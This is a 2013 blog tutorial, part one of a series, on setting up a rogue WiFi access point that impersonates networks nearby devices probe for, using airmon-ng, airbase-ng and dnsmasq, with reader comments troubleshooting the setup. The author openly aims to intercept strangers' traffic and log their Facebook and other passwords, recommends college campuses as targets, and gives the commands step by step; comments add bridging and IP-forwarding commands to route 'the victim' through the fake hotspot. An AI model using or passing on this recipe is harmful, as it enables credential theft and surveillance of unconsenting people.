Thursday, July 18, 2013

MITM - WIFI HONEYPOT

Well ..today after a long time I am writing an tutorial .. I had even bought www.achutetech.com and for a year but I didn't post any thing there so it just got lapsed , I am sorry for not keeping up..but now I am trying to continue  this blog by posting about the tings that I am trying these days...

Lets cut the crap .. and start of with our hacking .. :D

What are we doing today ?

Today we will create a fake wifi hotspot so that clients may connect to it and we can see what they are up to even log their facebook , or any web service  passwords if they happen to browse them on our hotspot.

Where can we use this ?

Well you can use it any where where there are lots of wifi users around i.e laptops , smart phones .. who have their wifi on and are searching for wifi networks. I would recommend places like college campus .. well I use them there :D

Um... So What the tech behind it ?

You will act as a valid wifi hotspot provider .. Providing free Internet access to everyone :) . Those who connect to it you will monitor all their data and then forward it to the real server you will be acting like a man in the middle.
Intercepting every data , Even changing them  to suit your needs and forwarding them to the real server and forwarding the replies back to the client.

[CLIENT] <-------------> [ YOU ] <------------> [INTERNET] 

What are the tools required ?

I use Linux and I suggest you should also , So I will be using Kali Linux . Its a Linux Distribution with all the tools required for hacking are usually pre installed .

  1. Linux OS
  2. Wifi Adapter which supports creating hosted network
  3. Internet  Connection 
  4. a little bit of Patience
  5. And this site of course,  to guide you ;)
If you have all this tools of  trade lets get started .. 

Software Required 

If you have Kali Linux or even Backtrack or any distribution which has aircrack-ng  suite of tools then you are good .. Else you need to install it from here - http://www.aircrack-ng.org/ or you can start your terminal / console and type

apt-get update
apt-get install aircrack-ng 

NOTE: even kali and backtrack users I suggest you use dnsmasq [instead of dhcpserver3 or dhcpd ]and install it once again even if its already installed.

Next you need to have dnsmasq to get it type

apt-get install dnsmasq
Now you are ready .. Lets start ..

Setting Up

First we need to gather some information ..plug in your usb wifi adapter if you have one and in terminal / console type 

ifconfig

You should see something like this on your screen
   
There you will see wlan0 or even wlan1 [If you have extra wifi adapter ] . Take a note of what you have and then type
  
airmon-ng start wlan0
or
airmon-ng start wlan1

depending on what you have You should be able to  see (monitor mode enabled on mon0) 

Now thats done .. lets proceed .. 
Next we need to monitor the airwaves to get the names of the wifi access point the clients are trying to connect to do that type 

airodumpn-ng mon0

You should be able to see a few clients and under probe you will find the name of the Access Point the client is trying to connect to in this example we see that the client is searching for the wifi access point named achutetech

So we will create a Fake Ap with the name of achutetech and try to make the client connect to us . To do this we type ..
 

airbase-ng --essid achutetech mon0

In our example we see this 

That we have successfully managed to create a fake AP and a client with an client also was successfully associated with our fake AP. But the client will still not be fully connected to our AP since we haven't provided it with any IP address  . To do so we use dnsmasq

Note :  I have tried using dhcpd or dnsserver3 but they seem to be error prone while configuring them  and it was getting errors like Interface name is too long and all so I switched to dnsmasq and it seems to work great :D
  
To verify that we have dnsmasq type
 

whereis dnsmasq

and to see whether we have the configuration file or not [I have noticed that even tough dnsmasq was installed on Kali Os it didnt have the dnsmasq.conf file so to get it type apt-get install dnsmasq ]

and to verify that we have the config file type

ls /etc/ | grep dnsmasq

if dnsmasq.conf file is returned then its well and good But if not try

apt-get install dnsmasq

Ok now we have the dnsmasq we need to configure a few things type

vim /etc/dnsmasq.conf

[How to use vim - I will be writing a quick tutorial on it soon ]
now scroll down to line 90 or around you should see

# interface=

change it to

interface=at0

// at0 is the interface in which our FAKE AP lies

now scroll down even more to line 141 you  should see

#dhcp-range=192.168.0.50,192.168.0.150,12h

just remove the #

and you are good to go :D

Now we have to supply an ip address to your router [i.e the fake ap ]

to do so type

ifconfig at0 192.168.0.1 up

and to start the dhcp service type

dnsmasq

Now your clients should be able to get an ip address for themselves.

We have Finished the configuration part for now .. The Fun Part will be in the next post :D

The Part two is ready - here is the link

MITM - WIFI Honeypot part 2



If you have any problems till now do comment below I will try my best to reply thanks ..


10 comments:

  1. Help!

    I have got a problem.
    It says failed to bind dhcp server socket. Already in use

    ReplyDelete
  2. i get the access point started but when i try to connect to it they are not getting any ip addresses. don't know what wrong..... need help figuring this out

    ReplyDelete
  3. help ! i get the access point started but clients aren't assigned any ip addresses. when i try to use the browser on the associated machine it says no internet connection

    ReplyDelete
  4. @Angchung .. That means other service is using the same port , my best guess restart your laptop and try once more , If the problem persists , i will try to solve it in my laptop and let u know..

    ReplyDelete
  5. @Kemp Ross , If the other devices are not getting ip address that means something is wrong with the DHCP server . Please read the above mentioned steps , to configure the dnsmasq , If it still fails , I will be happy to guide you.

    ReplyDelete
  6. how to share the internet connection (from eth0, wlan1/0, pppoe0) to at0 ? is no use if the victim doesn't get internet connecting to our fake ap. (i did read the part 2)

    ReplyDelete
    Replies
    1. Yes in order to do that we need to bridge the interfaces using the " brctl " command .

      Its is generally not available in Kali linux so you need to install it using
      " apt-get install bridge-utils "

      try to search for the brctl command in google .. If you arent able to do it, I will try to recreate the scenario in my own laptop and let you know.

      Delete
  7. My devices dont get an IP. The .config is as you described. And it looks like the server is starting. Iw bin trying to make a rouge AP for almost a week now, and your guide is by far the easyest and most self explaining. But please help me and the others with the IP problem.

    ReplyDelete
  8. My devices dont get an IP. The .config is as you described. And it looks like the server is starting. Iw bin trying to make a rouge AP for almost a week now, and your guide is by far the easyest and most self explaining. But please help me and the others with the IP problem.

    ReplyDelete
  9. This is another method I dont get to work, can annyone see what im doing wrong?

    $ ifconfig

    #My internet is coming from wlan1 "inet addr:192.168.0.104 Bcast:192.168.0.255 Mask:255.255.255.0"


    $ airmon-ng start wlan0
    $ airbase-ng --essid "FakeAP" mon0

    ######This far everything is OK, I can se the "FakeAP" from other computers. But I need to asign IP`s.

    #Verfiy details of logical access point interface
    $ ifconfig at0

    at0 Link encap:Ethernet HWaddr 10:08:b1:1e:be:b7
    BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:500
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)



    #Create a bridge interface (To chek Iw briged at0 to wlan1 (internett) and wlan0 (mon0))
    $ brctl addbr myBridge

    #Now, associate real interfaces (wlan1 and at0) to bridge interfaces
    #I needed to run this command to make it work: $ iw dev wlan1 set 4addr on
    $ brctl addif myBridge wlan1
    $ brctl addif myBridge at0

    #Verfiy details of new bridge interface
    $ brctl show

    #bridge name bridge id STP enabled interfaces
    #myBridge 8000.1008b11ebeb7 no at0
    wlan1

    ######Looks like wlan1 (internett) and at ("FakeAP"?) are connected.


    #Remove the IP address of wlan1 and at0 interfaces
    $ ifconfig wlan1 0.0.0.0 up
    $ ifconfig at0 0.0.0.0 up

    #Assign IP address to bridge interface we have created earlier. You can use your old wlan0 IP address or assign any IP free address on your network
    $ ifconfig myBridge 192.168.0.104/8 up

    $ ifconfig myBridge
    myBridge Link encap:Ethernet HWaddr 10:08:b1:1e:be:b7
    inet addr:192.168.0.104 Bcast:192.255.255.255 Mask:255.0.0.0
    inet6 addr: fe80::1208:b1ff:fe1e:beb7/64 Scope:Link
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:0 (0.0 B) TX bytes:648 (648.0 B)

    ######It looks like my bride has an assigned IP. The One From wlan1

    #Enable IP forwarding on your computer. In other word, your computer will work as a router. IT will perform NATing.
    $ echo 1 > /proc/sys/net/ipv4/ip_forward






    ######Try to restart "FakeAP"

    $ airbase-ng --essid "FakeAP" mon0
    16:06:20 Created tap interface at0
    16:06:20 Trying to set MTU on at0 to 1500
    16:06:20 Access Point with BSSID 10:08:B1:1E:BE:B7 started.
    Error: Got channel -1, expected a value > 0.
    16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
    16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
    16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"

    ######And the latest lines just repeats itselves, and the computer trying to connect with dont get an IP. WHat am I doing wrong.

    ReplyDelete

Comments and Back Links are made here to follow please Read our comments policy before writing any comments.